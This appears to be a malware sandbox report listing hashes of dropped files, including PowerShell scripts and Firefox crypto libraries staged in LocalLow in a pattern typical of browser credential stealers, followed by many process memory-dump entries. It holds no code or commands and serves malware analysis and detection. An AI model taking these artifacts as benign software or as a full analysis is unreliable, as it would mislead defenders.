b13b8ed9ec826dd5d9ab4ae67d407556e08a1a11330e8320bf513b01ef3e710a3259874085009ad92002a999d8618c77054eeb31803e28b2bda3a97066e77e22

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7088.tmp

MD5
d4a74d40252363d110544aa2f61b9a36

SHA1
b6a47e92b4c4796d5cb8f10aa4cafe2e2dbb97d8

SHA256
f717a3facf14172d27ae5bc475622e4853c4fa44e31d793e6170a8b2f822c200

SHA512
f55caf5e73b980fada22638d7d77bd585ecdbf8ec4aee49c4f5b911f4b8e915f18aa9e9830b0ae1cdb2f6445d9692e9090d232cc43279b5f7cc9e7e67da79f24

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5
794bf0ae26a7efb0c516cf4a7692c501

SHA1
c8f81d0ddd4d360dcbe0814a04a86748f99c6ff2

SHA256
97753653d52aaa961e4d1364b5b43551c76da9bb19e12f741bd67c986259e825

SHA512
20c97972a1256375157f82a859ce4936613fe109d54c63bbec25734edc3a567ca976b342a21ef5f25571b3c1959afe618ad9f9f17a817cfd731d1504541b1a75

Download Submit
C:\Users\Admin\AppData\Local\Temp\i2xhgsw3\i2xhgsw3.dll

MD5
c6e2212d2a568a67057fdb2fde0c9c79

SHA1
bd66dac5d7eaf2b6b02854863284c2560557f8e0

SHA256
ea6daab1a6a4f60413be4186c18d1884741aedcc2b08b618c2b6a8782795697a

SHA512
a4fc24b01b3480de497120d2355551bdc1dfc40bddc08bc5d82d0ccfd41ea2cb9441d6ac1d1543801a73c985e293f931ac6dd4539e47a976ff6392793522c953

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i2xhgsw3\CSCC7A74A6CCD2147D9B5306EC3A5757ECE.TMP

MD5
2a12ae122dcbf4b743c6b920c308caa3

SHA1
63533be65a18f031b9b8e64096e47f56ce2dcb7e

SHA256
9814ca7b17d6783587a61bda68520d4300fec0c0ce9c801963974c5412f4e426

SHA512
1f9a290e59a33e48348123a371ec83d024130ee4cc222b0643bc48e7d0efcdb470f8fcb41d4ceb0eaf675d2eb5d77b5992dde5020cc1e2deccf4a271a7690685

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i2xhgsw3\i2xhgsw3.0.cs

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i2xhgsw3\i2xhgsw3.cmdline

MD5
4ac27df1468e1c08197927f03f9a6c70

SHA1
614d0b62ff09964c6db8afca630cba74ad2317bb

SHA256
451adc229f0b4bf5776ba81ca776e71a91f207cb108afbbcecb0137ba794171f

SHA512
d529640a183f27a896052508717bd5c80b9f39e4259c31441a4fdb9ef021fa9d327e6727441942f16f709f427648dbb014c735b26232d36b5ff78c0e29519c86

Download Submit
\Users\Admin\AppData\LocalLow\FflibsFder.tmp\freebl3.dll

MD5
60acd24430204ad2dc7f148b8cfe9bdc

SHA1
989f377b9117d7cb21cbe92a4117f88f9c7693d9

SHA256
9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

SHA512
626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

Download Submit
\Users\Admin\AppData\LocalLow\FflibsFder.tmp\mozglue.dll

MD5
eae9273f8cdcf9321c6c37c244773139

SHA1
8378e2a2f3635574c106eea8419b5eb00b8489b0

SHA256
a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc

SHA512
06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

Download Submit
\Users\Admin\AppData\LocalLow\FflibsFder.tmp\nss3.dll

MD5
02cc7b8ee30056d5912de54f1bdfc219

SHA1
a6923da95705fb81e368ae48f93d28522ef552fb

SHA256
1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

SHA512
0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

Download Submit
\Users\Admin\AppData\LocalLow\FflibsFder.tmp\softokn3.dll

MD5
4e8df049f3459fa94ab6ad387f3561ac

SHA1
06ed392bc29ad9d5fc05ee254c2625fd65925114

SHA256
25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871

SHA512
3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5
f964811b68f9f1487c2b41e1aef576ce

SHA1
b423959793f14b1416bc3b7051bed58a1034025f

SHA256
83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

SHA512
565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

Download Submit
memory/424-1101-0x0000000000000000-mapping.dmp

Download
memory/428-1099-0x0000000000000000-mapping.dmp

Download
memory/612-1094-0x0000000000000000-mapping.dmp

Download
memory/616-242-0x0000000000000000-mapping.dmp

Download
memory/1044-1156-0x0000000000000000-mapping.dmp

Download
memory/1056-1157-0x0000000000000000-mapping.dmp

Download
memory/1124-776-0x0000000000000000-mapping.dmp

Download
memory/1124-789-0x0000000003560000-0x0000000003561000-memory.dmp

Filesize
4KB

Download
memory/1124-885-0x000000007FAF0000-0x000000007FAF1000-memory.dmp

Filesize
4KB

Download
memory/1124-791-0x0000000003562000-0x0000000003563000-memory.dmp

Filesize
4KB

Download
memory/1192-174-0x00000000059A0000-0x0000000005D9F000-memory.dmp

Filesize
4.0MB

Download
memory/1192-184-0x0000000003090000-0x0000000003091000-memory.dmp

Filesize
4KB

Download
memory/1192-196-0x0000000000A72000-0x0000000000A73000-memory.dmp

Filesize
4KB

Download
memory/1192-153-0x0000000000D1B000-0x0000000001121000-memory.dmp

Filesize
4.0MB

Download
memory/1192-150-0x0000000000000000-mapping.dmp

Download
memory/1192-198-0x0000000000A73000-0x0000000000A74000-memory.dmp

Filesize
4KB

Download
memory/1192-197-0x0000000008240000-0x0000000008241000-memory.dmp

Filesize
4KB

Download
memory/1192-202-0x0000000000A74000-0x0000000000A75000-memory.dmp

Filesize
4KB

Download
memory/1192-190-0x0000000001130000-0x0000000001532000-memory.dmp

Filesize
4.0MB

Download
memory/1192-193-0x0000000000A70000-0x0000000000A71000-memory.dmp

Filesize
4KB

Download
memory/1192-191-0x00000000063C0000-0x00000000063C1000-memory.dmp

Filesize
4KB

Download
memory/1192-192-0x0000000000400000-0x0000000000841000-memory.dmp

Filesize
4.3MB

Download
memory/1292-1057-0x0000000000000000-mapping.dmp

Download
memory/1480-161-0x0000000004FD0000-0x0000000004FD1000-memory.dmp

Filesize
4KB

Download
memory/1480-157-0x00000000005C0000-0x00000000005C1000-memory.dmp

Filesize
4KB

Download
memory/1480-154-0x0000000000000000-mapping.dmp

Download
memory/1480-159-0x0000000004E30000-0x0000000004E31000-memory.dmp

Filesize
4KB

Download
memory/1480-160-0x0000000004DB0000-0x0000000004DB1000-memory.dmp

Filesize
4KB

Download
memory/1480-162-0x00000000054E0000-0x00000000054E1000-memory.dmp

Filesize
4KB

Download
memory/1588-119-0x00000000008A0000-0x00000000008B6000-memory.dmp

Filesize
88KB

Download
memory/1592-1056-0x0000000000000000-mapping.dmp

Download
memory/1788-1102-0x0000000000000000-mapping.dmp

Download
memory/1836-239-0x0000000000000000-mapping.dmp

Download
memory/2180-1095-0x0000000000000000-mapping.dmp

Download
memory/2184-1098-0x0000000000000000-mapping.dmp

Download
memory/2212-374-0x000000007EDD0000-0x000000007EDD1000-memory.dmp

Filesize
4KB

Download
memory/2212-281-0x0000000000F20000-0x0000000000F21000-memory.dmp

Filesize
4KB

Download
memory/2212-270-0x0000000000000000-mapping.dmp

Download
memory/2212-282-0x0000000000F22000-0x0000000000F23000-memory.dmp

Filesize
4KB

Download
memory/2280-200-0x000000000F193000-0x000000000F194000-memory.dmp

Filesize
4KB

Download
memory/2280-203-0x000000000F194000-0x000000000F196000-memory.dmp

Filesize
8KB

Download
memory/2280-194-0x0000000000400000-0x00000000057CE000-memory.dmp

Filesize
83.8MB

Download
memory/2280-195-0x000000000F190000-0x000000000F191000-memory.dmp

Filesize
4KB

Download
memory/2280-178-0x000000000F040000-0x000000000F07D000-memory.dmp

Filesize
244KB

Download
memory/2280-199-0x000000000F192000-0x000000000F193000-memory.dmp

Filesize
4KB

Download
memory/2280-166-0x0000000007560000-0x000000000C876000-memory.dmp

Filesize
83.1MB

Download
memory/2280-163-0x0000000000000000-mapping.dmp

Download
memory/2280-181-0x000000000F0C0000-0x000000000F0FC000-memory.dmp

Filesize
240KB

Download
memory/2292-525-0x0000000000000000-mapping.dmp

Download
memory/2292-534-0x0000000006F80000-0x0000000006F81000-memory.dmp

Filesize
4KB

Download
memory/2292-535-0x0000000006F82000-0x0000000006F83000-memory.dmp

Filesize
4KB

Download
memory/2292-615-0x000000007E7F0000-0x000000007E7F1000-memory.dmp

Filesize
4KB

Download
memory/2292-1139-0x0000000000000000-mapping.dmp

Download
memory/2372-118-0x0000000000030000-0x0000000000039000-memory.dmp

Filesize
36KB

Download
memory/2416-1100-0x0000000000000000-mapping.dmp

Download
memory/2580-1055-0x0000000000000000-mapping.dmp

Download
memory/2748-140-0x00000000053C0000-0x00000000053C1000-memory.dmp

Filesize
4KB

Download
memory/2748-142-0x00000000053C2000-0x00000000053C3000-memory.dmp

Filesize
4KB

Download
memory/2748-145-0x0000000002A70000-0x0000000002A71000-memory.dmp

Filesize
4KB

Download
memory/2748-146-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/2748-204-0x0000000006950000-0x0000000006951000-memory.dmp

Filesize
4KB

Download
memory/2748-141-0x0000000002930000-0x0000000002931000-memory.dmp

Filesize
4KB

Download
memory/2748-147-0x00000000053C4000-0x00000000053C5000-memory.dmp

Filesize
4KB

Download
memory/2748-143-0x0000000002960000-0x0000000002961000-memory.dmp

Filesize
4KB

Download
memory/2748-129-0x0000000000000000-mapping.dmp

Download
memory/2748-205-0x0000000006B20000-0x0000000006B21000-memory.dmp

Filesize
4KB

Download
memory/2748-132-0x0000000000740000-0x0000000000771000-memory.dmp

Filesize
196KB

Download
memory/2748-137-0x00000000008B0000-0x00000000008CC000-memory.dmp

Filesize
112KB

Download
memory/2748-139-0x00000000053D0000-0x00000000053D1000-memory.dmp

Filesize
4KB

Download
memory/2748-144-0x00000000053C3000-0x00000000053C4000-memory.dmp

Filesize
4KB

Download
memory/2864-120-0x0000000000000000-mapping.dmp

Download
memory/2864-127-0x0000000006AF0000-0x000000000B34B000-memory.dmp

Filesize
72.4MB

Download
memory/2864-128-0x0000000000400000-0x0000000004CBB000-memory.dmp

Filesize
72.7MB

Download
memory/2928-201-0x0000000005270000-0x0000000005876000-memory.dmp

Filesize
6.0MB

Download
memory/2928-167-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2928-168-0x000000000041B25E-mapping.dmp

Download
memory/3068-1104-0x0000000000000000-mapping.dmp

Download
memory/3564-117-0x0000000000402DF8-mapping.dmp

Download
memory/3564-116-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3608-232-0x0000000000970000-0x0000000000971000-memory.dmp

Filesize
4KB

Download
memory/3608-220-0x0000000006F20000-0x0000000006F21000-memory.dmp

Filesize
4KB

Download
memory/3608-210-0x0000000000F30000-0x0000000000F31000-memory.dmp

Filesize
4KB

Download
memory/3608-212-0x0000000007240000-0x0000000007241000-memory.dmp

Filesize
4KB

Download
memory/3608-206-0x0000000000000000-mapping.dmp

Download
memory/3608-215-0x0000000006E10000-0x0000000006E11000-memory.dmp

Filesize
4KB

Download
memory/3608-223-0x0000000006C02000-0x0000000006C03000-memory.dmp

Filesize
4KB

Download
memory/3608-221-0x0000000006C00000-0x0000000006C01000-memory.dmp

Filesize
4KB

Download
memory/3608-207-0x0000000000970000-0x0000000000971000-memory.dmp

Filesize
4KB

Download
memory/3608-248-0x0000000006C03000-0x0000000006C04000-memory.dmp

Filesize
4KB

Download
memory/3608-216-0x0000000007130000-0x0000000007131000-memory.dmp

Filesize
4KB

Download
memory/3608-208-0x0000000000970000-0x0000000000971000-memory.dmp

Filesize
4KB

Download
memory/3608-219-0x0000000007870000-0x0000000007871000-memory.dmp

Filesize
4KB

Download
memory/3644-123-0x0000000000000000-mapping.dmp

Download
memory/3644-149-0x0000000000400000-0x0000000000491000-memory.dmp

Filesize
580KB

Download
memory/3644-148-0x0000000000740000-0x00000000007CE000-memory.dmp

Filesize
568KB

Download
memory/3976-1140-0x0000000000000000-mapping.dmp

Download
memory/4052-1103-0x0000000000000000-mapping.dmp

Download
memory/4064-1105-0x0000000000000000-mapping.dmp

Download